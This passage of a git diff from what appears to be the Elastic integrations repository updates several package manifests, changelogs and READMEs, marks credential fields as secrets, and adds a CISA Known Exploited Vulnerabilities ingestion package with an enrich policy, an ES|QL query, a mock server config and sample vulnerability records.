yvgJ38BRsFOtkRuAGSf6ZUwTO8JJRRIFnpUzXflAnGivK9M13D5GEQMmIl6U9Pvk + # sxSmbIUfc2SGJGCJD4I= + # -----END CERTIFICATE----- + - type: cel + title: Collect Carbon Black Cloud logs via API using CEL [Beta] + description: Collect Carbon Black Cloud logs via API using CEL. + vars: + - name: hostname + type: text + title: Hostname + description: Carbon Black Cloud console Hostname. Find hostname in the console dashboard at the beginning of the web address (Add https:// before the hostname). + required: true + - name: enable_request_tracer + type: bool + title: Enable request tracing + multi: false + required: false + show_user: false + description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details. + - name: org_key + type: text + title: Organization Key + description: Organization Key. + required: true + - name: custom_api_id + type: text + title: Custom API ID + description: API ID with Custom Access Level type. + required: true + - name: custom_api_secret_key + type: password + title: Custom API Secret Key + description: API Secret Key with Custom Access Level type. + required: true + secret: true - name: proxy_url type: text title: Proxy URL @@ -123,11 +193,14 @@ policy_templates: description: It is a required parameter for collecting logs via the AWS S3 Bucket. - name: queue_url type: text - title: "[SQS] Queue URL" + title: "[Global][SQS] Queue URL" multi: false required: false show_user: true - description: URL of the AWS SQS queue that messages will be received from. It is a required parameter for collecting logs via the AWS SQS. + description: |- + URL of the AWS SQS queue that messages will be received from. + This is only required if you want to collect logs via AWS SQS. + This is a global queue URL, i.e this can be overridden by specific local queue URLs for each data stream if required. - name: access_key_id type: password title: Access Key ID @@ -135,6 +208,7 @@ policy_templates: required: false show_user: true description: First part of access key. + secret: true - name: secret_access_key type: password title: Secret Access Key @@ -142,13 +216,15 @@ policy_templates: required: false show_user: true description: Second part of access key. + secret: true - name: session_token - type: text + type: password title: Session Token multi: false required: false show_user: true description: Required when using temporary security credentials. + secret: true - name: shared_credential_file type: text title: Shared Credential File diff --git a/packages/carbonblack_edr/changelog.yml b/packages/carbonblack_edr/changelog.yml index 96f769c3961..776174ec3a9 100644 --- a/packages/carbonblack_edr/changelog.yml +++ b/packages/carbonblack_edr/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.17.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9399 - version: "1.16.2" changes: - description: Changed owners diff --git a/packages/carbonblack_edr/data_stream/log/_dev/test/system/test-http-config.yml b/packages/carbonblack_edr/data_stream/log/_dev/test/system/test-http-config.yml index bdd56f0c19f..e541ea0e844 100644 --- a/packages/carbonblack_edr/data_stream/log/_dev/test/system/test-http-config.yml +++ b/packages/carbonblack_edr/data_stream/log/_dev/test/system/test-http-config.yml @@ -15,3 +15,5 @@ numeric_keyword_fields: - carbonblack.edr.segment_id - carbonblack.edr.sensor_id - rule.id +assert: + hit_count: 21 diff --git a/packages/carbonblack_edr/data_stream/log/_dev/test/system/test-logfile-config.yml b/packages/carbonblack_edr/data_stream/log/_dev/test/system/test-logfile-config.yml index e55c2a819d4..3237e028ab8 100644 --- a/packages/carbonblack_edr/data_stream/log/_dev/test/system/test-logfile-config.yml +++ b/packages/carbonblack_edr/data_stream/log/_dev/test/system/test-logfile-config.yml @@ -13,3 +13,5 @@ numeric_keyword_fields: - carbonblack.edr.segment_id - carbonblack.edr.sensor_id - rule.id +assert: + hit_count: 21 diff --git a/packages/carbonblack_edr/data_stream/log/_dev/test/system/test-tcp-config.yml b/packages/carbonblack_edr/data_stream/log/_dev/test/system/test-tcp-config.yml index a52baab279d..39b560cc338 100644 --- a/packages/carbonblack_edr/data_stream/log/_dev/test/system/test-tcp-config.yml +++ b/packages/carbonblack_edr/data_stream/log/_dev/test/system/test-tcp-config.yml @@ -15,3 +15,5 @@ numeric_keyword_fields: - carbonblack.edr.segment_id - carbonblack.edr.sensor_id - rule.id +assert: + hit_count: 21 diff --git a/packages/carbonblack_edr/data_stream/log/_dev/test/system/test-udp-config.yml b/packages/carbonblack_edr/data_stream/log/_dev/test/system/test-udp-config.yml index fdb19629873..0fbe453506d 100644 --- a/packages/carbonblack_edr/data_stream/log/_dev/test/system/test-udp-config.yml +++ b/packages/carbonblack_edr/data_stream/log/_dev/test/system/test-udp-config.yml @@ -15,3 +15,5 @@ numeric_keyword_fields: - carbonblack.edr.segment_id - carbonblack.edr.sensor_id - rule.id +assert: + hit_count: 21 diff --git a/packages/carbonblack_edr/manifest.yml b/packages/carbonblack_edr/manifest.yml index f3e50dbe2f1..97243c9291e 100644 --- a/packages/carbonblack_edr/manifest.yml +++ b/packages/carbonblack_edr/manifest.yml @@ -1,9 +1,9 @@ name: carbonblack_edr title: VMware Carbon Black EDR -version: "1.16.2" +version: "1.17.0" description: Collect logs from VMware Carbon Black EDR with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.3" categories: [security, edr_xdr] conditions: kibana: diff --git a/packages/cassandra/_dev/build/docs/README.md b/packages/cassandra/_dev/build/docs/README.md index 9e11dc2ed00..8b0dfe5eeee 100644 --- a/packages/cassandra/_dev/build/docs/README.md +++ b/packages/cassandra/_dev/build/docs/README.md @@ -8,10 +8,7 @@ This integration has been tested against `Cassandra version 3.11.11`. ### Troubleshooting -If log.flags is shown conflicted under the ``logs-*`` data view, then this issue can be solved by reindexing the ``Logs`` data stream's indices. - -Note: -- This [document](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) provides details about reindexing. +- If `log.flags` appears conflicted under the ``logs-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Logs`` data stream. ## Logs diff --git a/packages/cassandra/changelog.yml b/packages/cassandra/changelog.yml index b1fbe519dfd..a20e00bdec5 100644 --- a/packages/cassandra/changelog.yml +++ b/packages/cassandra/changelog.yml @@ -1,4 +1,29 @@ # newer versions go on top +- version: "1.12.1" + changes: + - description: Update README with reindexing steps. + type: enhancement + link: https://github.com/elastic/integrations/pull/9529 +- version: 1.12.0 + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: 1.11.1 + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: 1.11.0 + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 +- version: 1.10.1 + changes: + - description: Update the link to the correct reindexing procedure. + type: bugfix + link: https://github.com/elastic/integrations/pull/9021 - version: 1.10.0 changes: - description: Update the package format_version to 3.0.0. diff --git a/packages/cassandra/docs/README.md b/packages/cassandra/docs/README.md index f1e5571a97a..0aed2b47ac8 100644 --- a/packages/cassandra/docs/README.md +++ b/packages/cassandra/docs/README.md @@ -8,10 +8,7 @@ This integration has been tested against `Cassandra version 3.11.11`. ### Troubleshooting -If log.flags is shown conflicted under the ``logs-*`` data view, then this issue can be solved by reindexing the ``Logs`` data stream's indices. - -Note: -- This [document](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) provides details about reindexing. +- If `log.flags` appears conflicted under the ``logs-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Logs`` data stream. ## Logs diff --git a/packages/cassandra/manifest.yml b/packages/cassandra/manifest.yml index 34d4680c712..d25cb22ae33 100644 --- a/packages/cassandra/manifest.yml +++ b/packages/cassandra/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: cassandra title: Cassandra -version: "1.10.0" +version: "1.12.1" description: This Elastic integration collects logs and metrics from cassandra. type: integration categories: @@ -9,7 +9,7 @@ categories: - observability conditions: kibana: - version: "^8.8.0" + version: "^8.12.0" elastic: subscription: basic screenshots: @@ -61,6 +61,7 @@ policy_templates: - name: password type: password title: Password + secret: true multi: false required: false show_user: false diff --git a/packages/cef/changelog.yml b/packages/cef/changelog.yml index 23f22e41983..5f87debe689 100644 --- a/packages/cef/changelog.yml +++ b/packages/cef/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "2.17.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "2.16.2" changes: - description: Changed owners diff --git a/packages/cef/manifest.yml b/packages/cef/manifest.yml index 295f6012ea1..aae5b0767da 100644 --- a/packages/cef/manifest.yml +++ b/packages/cef/manifest.yml @@ -1,13 +1,13 @@ name: cef title: Common Event Format (CEF) -version: "2.16.2" +version: "2.17.0" description: Collect logs from CEF Logs with Elastic Agent. categories: - security conditions: kibana: version: ^8.6.1 -format_version: "3.0.0" +format_version: "3.0.3" policy_templates: - name: cef title: CEF logs diff --git a/packages/cel/changelog.yml b/packages/cel/changelog.yml index 4a1ac2d416e..cc0d3f88c90 100644 --- a/packages/cel/changelog.yml +++ b/packages/cel/changelog.yml @@ -1,3 +1,13 @@ +- version: "1.9.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 +- version: "1.8.0" + changes: + - description: Clarify naming of input. + type: enhancement + link: https://github.com/elastic/integrations/pull/9018 - version: "1.7.1" changes: - description: Changed owners diff --git a/packages/cel/docs/README.md b/packages/cel/docs/README.md index 6b6579267fa..6773e9e085d 100644 --- a/packages/cel/docs/README.md +++ b/packages/cel/docs/README.md @@ -1,8 +1,8 @@ # CEL Custom API input integration -The CEL custom API input integration is used to ingest data from custom HTTP and local file-system APIs that do not currently have an existing integration. +The Common Expression Language (CEL) custom API input integration is used to ingest data from custom HTTP and local file-system APIs that do not currently have an existing integration. -The input itself supports making both HTTP requests and file-system read operations, and keeping running and persistent state on information from the last collected events. The input performs [Common Expression Language](https://opensource.google.com/projects/cel) with a [set of standard extensions](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-cel.html#_cel_extension_libraries) to both obtain input data from the API and then process the data into events that are published to Elasticsearch. +The input itself supports making both HTTP requests and file-system read operations, and keeping running and persistent state on information from the last collected events. The input performs [Common Expression Language](https://opensource.google.com/projects/cel) expression evaluation with a [set of standard extensions](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-cel.html#_cel_extension_libraries) to both obtain input data from the API and then process the data into events that are published to Elasticsearch. ## Configuration diff --git a/packages/cel/manifest.yml b/packages/cel/manifest.yml index 369166dc300..e5566014cb5 100644 --- a/packages/cel/manifest.yml +++ b/packages/cel/manifest.yml @@ -1,14 +1,14 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: cel -title: CEL Custom API +title: Custom API using Common Expression Language description: Collect custom events from an API with Elastic agent type: input -version: "1.7.1" +version: "1.9.0" categories: - custom conditions: kibana: - version: "^8.8.0" + version: "^8.12.0" elastic: subscription: "basic" policy_templates: @@ -102,6 +102,7 @@ policy_templates: show_user: true required: false description: The password to be used with Basic Auth headers + secret: true - name: oauth_id type: text title: Oauth2 Client ID @@ -114,12 +115,14 @@ policy_templates: description: Client secret used for Oauth2 authentication show_user: true required: false + secret: true - name: oauth_token_url type: text title: Oauth2 Token URL description: The URL endpoint that will be used to generate the tokens during the oauth2 flow. It is required if no oauth_custom variable is set or provider is not specified in oauth_custom variable. show_user: true required: false + secret: false - name: redact_fields type: text title: Redacted fields diff --git a/packages/ceph/_dev/build/docs/README.md b/packages/ceph/_dev/build/docs/README.md index cb2fbfb83ad..ec84c3ef721 100644 --- a/packages/ceph/_dev/build/docs/README.md +++ b/packages/ceph/_dev/build/docs/README.md @@ -89,97 +89,7 @@ After the integration is successfully configured, clicking on the Assets tab of ### Troubleshooting -If host.ip is shown conflicted under ``logs-*`` data view, then this issue can be solved by reindexing the ``Cluster Disk``, ``Cluster Health``, ``Cluster Status``, ``OSD Performance``, ``OSD Pool Stats``, ``OSD Tree`` and ``Pool Disk`` data stream's indices. -To reindex the data, the following steps must be performed. - -1. Stop the data stream by going to `Integrations -> Ceph -> Integration policies` open the configuration of Ceph and disable the `Collect Ceph metrics` toggle to reindex logs data streams and save the integration. - -2. Copy data into the temporary index and delete the existing data stream and index template by performing the following steps in the Dev tools. - -``` -POST _reindex -{ - "source": { - "index": "" - }, - "dest": { - "index": "temp_index" - } -} -``` -Example: -``` -POST _reindex -{ - "source": { - "index": "logs-ceph.cluster_disk-default" - }, - "dest": { - "index": "temp_index" - } -} -``` - -``` -DELETE /_data_stream/ -``` -Example: -``` -DELETE /_data_stream/logs-ceph.cluster_disk-default -``` - -``` -DELETE _index_template/ -``` -Example: -``` -DELETE _index_template/logs-ceph.cluster_disk -``` -3. Go to `Integrations -> Ceph -> Settings` and click on `Reinstall Ceph`. - -4. Copy data from temporary index to new index by performing the following steps in the Dev tools. - -``` -POST _reindex -{ - "conflicts": "proceed", - "source": { - "index": "temp_index" - }, - "dest": { - "index": "", - "op_type": "create" - - } -} -``` -Example: -``` -POST _reindex -{ - "conflicts": "proceed", - "source": { - "index": "temp_index" - }, - "dest": { - "index": "logs-ceph.cluster_disk-default", - "op_type": "create" - - } -} -``` - -5. Verify data is reindexed completely. - -6. Start the data stream by going to the `Integrations -> Ceph -> Integration policies` and open configuration of integration and enable the `Collect Ceph metrics` toggle and save the integration. - -7. Delete temporary index by performing the following step in the Dev tools. - -``` -DELETE temp_index -``` - -More details about reindexing can be found [here](https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-reindex.html). +- If `host.ip` appears conflicted under the ``logs-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Cluster Disk``, ``Cluster health``, ``Cluster Status``, ``OSD Performance``, ``OSD Pool Stats``, ``OSD Tree`` and ``Pool Disk`` data streams. ## Metrics reference diff --git a/packages/ceph/changelog.yml b/packages/ceph/changelog.yml index 53a0d967d12..c827cf3beee 100644 --- a/packages/ceph/changelog.yml +++ b/packages/ceph/changelog.yml @@ -1,4 +1,24 @@ # newer versions go on top +- version: "1.4.1" + changes: + - description: Update README with reindexing steps. + type: enhancement + link: https://github.com/elastic/integrations/pull/9529 +- version: "1.4.0" + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: "1.3.1" + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: "1.3.0" + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: "1.2.0" changes: - description: Limit request tracer log count to five. diff --git a/packages/ceph/docs/README.md b/packages/ceph/docs/README.md index 666606ab0c2..7543210cbd3 100644 --- a/packages/ceph/docs/README.md +++ b/packages/ceph/docs/README.md @@ -89,97 +89,7 @@ After the integration is successfully configured, clicking on the Assets tab of ### Troubleshooting -If host.ip is shown conflicted under ``logs-*`` data view, then this issue can be solved by reindexing the ``Cluster Disk``, ``Cluster Health``, ``Cluster Status``, ``OSD Performance``, ``OSD Pool Stats``, ``OSD Tree`` and ``Pool Disk`` data stream's indices. -To reindex the data, the following steps must be performed. - -1. Stop the data stream by going to `Integrations -> Ceph -> Integration policies` open the configuration of Ceph and disable the `Collect Ceph metrics` toggle to reindex logs data streams and save the integration. - -2. Copy data into the temporary index and delete the existing data stream and index template by performing the following steps in the Dev tools. - -``` -POST _reindex -{ - "source": { - "index": "" - }, - "dest": { - "index": "temp_index" - } -} -``` -Example: -``` -POST _reindex -{ - "source": { - "index": "logs-ceph.cluster_disk-default" - }, - "dest": { - "index": "temp_index" - } -} -``` - -``` -DELETE /_data_stream/ -``` -Example: -``` -DELETE /_data_stream/logs-ceph.cluster_disk-default -``` - -``` -DELETE _index_template/ -``` -Example: -``` -DELETE _index_template/logs-ceph.cluster_disk -``` -3. Go to `Integrations -> Ceph -> Settings` and click on `Reinstall Ceph`. - -4. Copy data from temporary index to new index by performing the following steps in the Dev tools. - -``` -POST _reindex -{ - "conflicts": "proceed", - "source": { - "index": "temp_index" - }, - "dest": { - "index": "", - "op_type": "create" - - } -} -``` -Example: -``` -POST _reindex -{ - "conflicts": "proceed", - "source": { - "index": "temp_index" - }, - "dest": { - "index": "logs-ceph.cluster_disk-default", - "op_type": "create" - - } -} -``` - -5. Verify data is reindexed completely. - -6. Start the data stream by going to the `Integrations -> Ceph -> Integration policies` and open configuration of integration and enable the `Collect Ceph metrics` toggle and save the integration. - -7. Delete temporary index by performing the following step in the Dev tools. - -``` -DELETE temp_index -``` - -More details about reindexing can be found [here](https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-reindex.html). +- If `host.ip` appears conflicted under the ``logs-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Cluster Disk``, ``Cluster health``, ``Cluster Status``, ``OSD Performance``, ``OSD Pool Stats``, ``OSD Tree`` and ``Pool Disk`` data streams. ## Metrics reference diff --git a/packages/ceph/manifest.yml b/packages/ceph/manifest.yml index 41dee9e4db9..81110b47cac 100644 --- a/packages/ceph/manifest.yml +++ b/packages/ceph/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: ceph title: Ceph -version: "1.2.0" +version: "1.4.1" description: This Elastic integration collects metrics from Ceph instance. type: integration categories: @@ -9,7 +9,7 @@ categories: - os_system conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 elastic: subscription: basic screenshots: @@ -63,6 +63,7 @@ policy_templates: - name: api_secret type: password title: API Secret Key + secret: true show_user: true required: true default: 52dffd92-a103-4a10-bfce-5b60f48f764e diff --git a/packages/checkpoint/changelog.yml b/packages/checkpoint/changelog.yml index 212493018c9..1e94752601d 100644 --- a/packages/checkpoint/changelog.yml +++ b/packages/checkpoint/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.31.0" + changes: + - description: Update package-spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "1.30.2" changes: - description: Changed owners diff --git a/packages/checkpoint/manifest.yml b/packages/checkpoint/manifest.yml index 3acfe3ea1ab..26c0b791d53 100644 --- a/packages/checkpoint/manifest.yml +++ b/packages/checkpoint/manifest.yml @@ -1,9 +1,9 @@ name: checkpoint title: Check Point -version: 1.30.2 +version: "1.31.0" description: Collect logs from Check Point with Elastic Agent. type: integration -format_version: "3.0.1" +format_version: "3.0.3" categories: [security, network, firewall_security] conditions: kibana: diff --git a/packages/cisa_kevs/LICENSE.txt b/packages/cisa_kevs/LICENSE.txt new file mode 100644 index 00000000000..44d36d98d5e --- /dev/null +++ b/packages/cisa_kevs/LICENSE.txt @@ -0,0 +1,21 @@ +MIT License + +Copyright (c) 2024 nicpenning + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. \ No newline at end of file diff --git a/packages/cisa_kevs/_dev/build/build.yml b/packages/cisa_kevs/_dev/build/build.yml new file mode 100644 index 00000000000..2bfcfc223b0 --- /dev/null +++ b/packages/cisa_kevs/_dev/build/build.yml @@ -0,0 +1,3 @@ +dependencies: + ecs: + reference: "git@v8.11.0" diff --git a/packages/cisa_kevs/_dev/build/docs/README.md b/packages/cisa_kevs/_dev/build/docs/README.md new file mode 100644 index 00000000000..62c9453f9c0 --- /dev/null +++ b/packages/cisa_kevs/_dev/build/docs/README.md @@ -0,0 +1,48 @@ +# CISA KEV integration + +This integration is for [CISA KEV](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) logs. This data can be useful for current awareness of Known Exploited Vulnerabilities according to CISA and also for enriching other vulnerability scan data in the Elastic stack. The integration periodically checks for the latest CISA KEV list. It includes the following datasets for retrieving logs from the CISA KEV website: + +- `vulnerability` dataset: Supports vulnerabilities classified as known exploited from CISA. + +### Example Enrich Policy and ES|QL Correlation Query + +An enrich policy can be created to have other vulnerability information be enriched based on the CVE number. + +The following requests can be used to create and execute the enrich policy after the integration has been installed: + +``` +PUT /_enrich/policy/enrich_cve_with_context_cisa_kev +{ + "match": { + "indices": ".ds-logs-cisa_kevs.vulnerability-*", + "match_field": "vulnerability.id", + "enrich_fields": ["cisa_kev.vulnerability.date_added", "cisa_kev.vulnerability.due_date", "cisa_kev.vulnerability.known_ransomware_campaign_use", "cisa_kev.vulnerability.name", "cisa_kev.vulnerability.notes","cisa_kev.vulnerability.product","cisa_kev.vulnerability.required_action","cisa_kev.vulnerability.vendor_project"] + } +} + +PUT /_enrich/policy/enrich_cve_with_context_cisa_kev/_execute +``` + +Here is an example ES|QL query that uses the index pattern of logs-nessus.vulnerability* to enrich the data source with CISA KEV information and keeping the top 10 results. Note, the enrich policy (shown above) must be created first: + +``` +from logs-nessus.vulnerability* +| where vulnerability.id IS NOT NULL +| keep vulnerability.*, nessus.plugin.name, host.name +| enrich enrich_cve_with_context_cisa_kev with cisa_kev.vulnerability.due_date, cisa_kev.vulnerability.known_ransomware_campaign_use, cisa_kev.vulnerability.name, cisa_kev.vulnerability.notes, cisa_kev.vulnerability.product, cisa_kev.vulnerability.required_action, cisa_kev.vulnerability.vendor_project, cisa_kev.vulnerability.date_added +| where cisa_kev.vulnerability.name IS NOT NULL +| stats count = COUNT(host.name) BY nessus.plugin.name, vulnerability.severity, cisa_kev.vulnerability.date_added, cisa_kev.vulnerability.product +| sort count desc +| keep nessus.plugin.name, vulnerability.severity, cisa_kev.vulnerability.product, cisa_kev.vulnerability.date_added, count +| limit 10 +``` + +## Logs + +### Vulnerabilities + +The CISA KEV data_stream retrieves vulnerability information from the endpoint `https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json`. + +{{event "vulnerability"}} + +{{fields "vulnerability"}} \ No newline at end of file diff --git a/packages/cisa_kevs/_dev/deploy/docker/docker-compose.yml b/packages/cisa_kevs/_dev/deploy/docker/docker-compose.yml new file mode 100644 index 00000000000..c09fbc181a1 --- /dev/null +++ b/packages/cisa_kevs/_dev/deploy/docker/docker-compose.yml @@ -0,0 +1,14 @@ +version: "2.3" +services: + cisakev: + image: docker.elastic.co/observability/stream:v0.7.0 + ports: + - 8080 + volumes: + - ./files:/files:ro + environment: + PORT: 8080 + command: + - http-server + - --addr=:8080 + - --config=/files/config.yml diff --git a/packages/cisa_kevs/_dev/deploy/docker/files/config.yml b/packages/cisa_kevs/_dev/deploy/docker/files/config.yml new file mode 100644 index 00000000000..fba19a18d4b --- /dev/null +++ b/packages/cisa_kevs/_dev/deploy/docker/files/config.yml @@ -0,0 +1,8 @@ +rules: + - path: /sites/default/files/feeds/known_exploited_vulnerabilities.json + methods: ["GET"] + request_headers: + Content-Type: "application/json" + responses: + - status_code: 200 + body: "{\n \"title\": \"CISA Catalog of Known Exploited Vulnerabilities\",\n \"catalogVersion\": \"2024.02.16\",\n \"dateReleased\": \"2024-02-16T19:54:05.3915Z\",\n \"count\": 1081,\n \"vulnerabilities\": [\n {\n \"cveID\":\"CVE-2020-3259\",\"vendorProject\":\"Cisco\",\"product\":\"Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD)\",\"vulnerabilityName\":\"Cisco ASA and FTD Information Disclosure Vulnerability\",\"dateAdded\":\"2024-02-15\",\"shortDescription\":\"Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) contain an information disclosure vulnerability. An attacker could retrieve memory contents on an affected device, which could lead to the disclosure of confidential information due to a buffer tracking issue when the software parses invalid URLs that are requested from the web services interface. This vulnerability affects only specific AnyConnect and WebVPN configurations.\",\"requiredAction\":\"Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\",\"dueDate\":\"2024-03-07\",\"knownRansomwareCampaignUse\":\"Known\",\"notes\":\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-info-disclose-9eJtycMB\"\n },\n {\n \"cveID\":\"CVE-2024-21410\",\"vendorProject\":\"Microsoft\",\"product\":\"Exchange Server\",\"vulnerabilityName\":\"Microsoft Exchange Server Privilege Escalation Vulnerability\",\"dateAdded\":\"2024-02-15\",\"shortDescription\":\"Microsoft Exchange Server contains an unspecified vulnerability that allows for privilege escalation.\",\"requiredAction\":\"Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\",\"dueDate\":\"2024-03-07\",\"knownRansomwareCampaignUse\":\"Unknown\",\"notes\":\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21410\"\n },\n { \n \"cveID\":\"CVE-2024-1709\",\"vendorProject\":\"ConnectWise\",\"product\":\"ScreenConnect\",\"vulnerabilityName\":\"ConnectWise ScreenConnect Authentication Bypass Vulnerability\",\"dateAdded\":\"2024-02-22\",\"shortDescription\":\"ConnectWise ScreenConnect contains an authentication bypass vulnerability that allows an attacker with network access to the management interface to create a new, administrator-level account on affected devices.\",\"requiredAction\":\"Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\",\"dueDate\":\"2024-02-29\",\"knownRansomwareCampaignUse\":\"Known\",\"notes\":\"https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8\"\n }\n ]\n}" diff --git a/packages/cisa_kevs/changelog.yml b/packages/cisa_kevs/changelog.yml new file mode 100644 index 00000000000..eba8459ab02 --- /dev/null +++ b/packages/cisa_kevs/changelog.yml @@ -0,0 +1,11 @@ +# newer versions go on top +- version: "1.0.0" + changes: + - description: Add Enrich/ES|QL Samples to Readme, make GA. + type: enhancement + link: https://github.com/elastic/integrations/pull/9492 +- version: "0.1.0" + changes: + - description: Initial draft of the package + type: enhancement + link: https://github.com/elastic/integrations/pull/9240 diff --git a/packages/cisa_kevs/data_stream/vulnerability/_dev/test/pipeline/test-cisakev-ndjson.log b/packages/cisa_kevs/data_stream/vulnerability/_dev/test/pipeline/test-cisakev-ndjson.log new file mode 100644 index 00000000000..2463f40da5a --- /dev/null +++ b/packages/cisa_kevs/data_stream/vulnerability/_dev/test/pipeline/test-cisakev-ndjson.log @@ -0,0 +1,3 @@ +{"cveID":"CVE-2020-3259","vendorProject":"Cisco","product":"Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD)","vulnerabilityName":"Cisco ASA and FTD Information Disclosure Vulnerability","dateAdded":"2024-02-15","shortDescription":"Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) contain an information disclosure vulnerability. An attacker could retrieve memory contents on an affected device, which could lead to the disclosure of confidential information due to a buffer tracking issue when the software parses invalid URLs that are requested from the web services interface. This vulnerability affects only specific AnyConnect and WebVPN configurations.","requiredAction":"Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.","dueDate":"2024-03-07","knownRansomwareCampaignUse":"Known","notes":"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-info-disclose-9eJtycMB"} +{"cveID":"CVE-2024-21410","vendorProject":"Microsoft","product":"Exchange Server","vulnerabilityName":"Microsoft Exchange Server Privilege Escalation Vulnerability","dateAdded":"2024-02-15","shortDescription":"Microsoft Exchange Server contains an unspecified vulnerability that allows for privilege escalation.","requiredAction":"Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.","dueDate":"2024-03-07","knownRansomwareCampaignUse":"Unknown","notes":"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21410"} +{"cveID":"CVE-2024-1709","vendorProject":"ConnectWise","product":"ScreenConnect","vulnerabilityName":"ConnectWise ScreenConnect Authentication Bypass Vulnerability","dateAdded":"2024-02-22","shortDescription":"ConnectWise ScreenConnect contains an authentication bypass vulnerability that allows an attacker with network access to the management interface to create a new, administrator-level account on affected devices.","requiredAction":"Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.","dueDate":"2024-02-29","knownRansomwareCampaignUse":"Known","notes":"https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8"} diff --git a/packages/cisa_kevs/data_stream/vulnerability/_dev/test/pipeline/test-cisakev-ndjson.log-expected.json b/packages/cisa_kevs/data_stream/vulnerability/_dev/test/pipeline/test-cisakev-ndjson.log-expected.json new file mode 100644 index 00000000000..7ebbac62ce9 --- /dev/null +++ b/packages/cisa_kevs/data_stream/vulnerability/_dev/test/pipeline/test-cisakev-ndjson.log-expected.json @@ -0,0 +1,109 @@ +{ + "expected": [ + { + "@timestamp": "2024-02-15T00:00:00.000Z", + "cisa_kev": { + "vulnerability": { + "date_added": 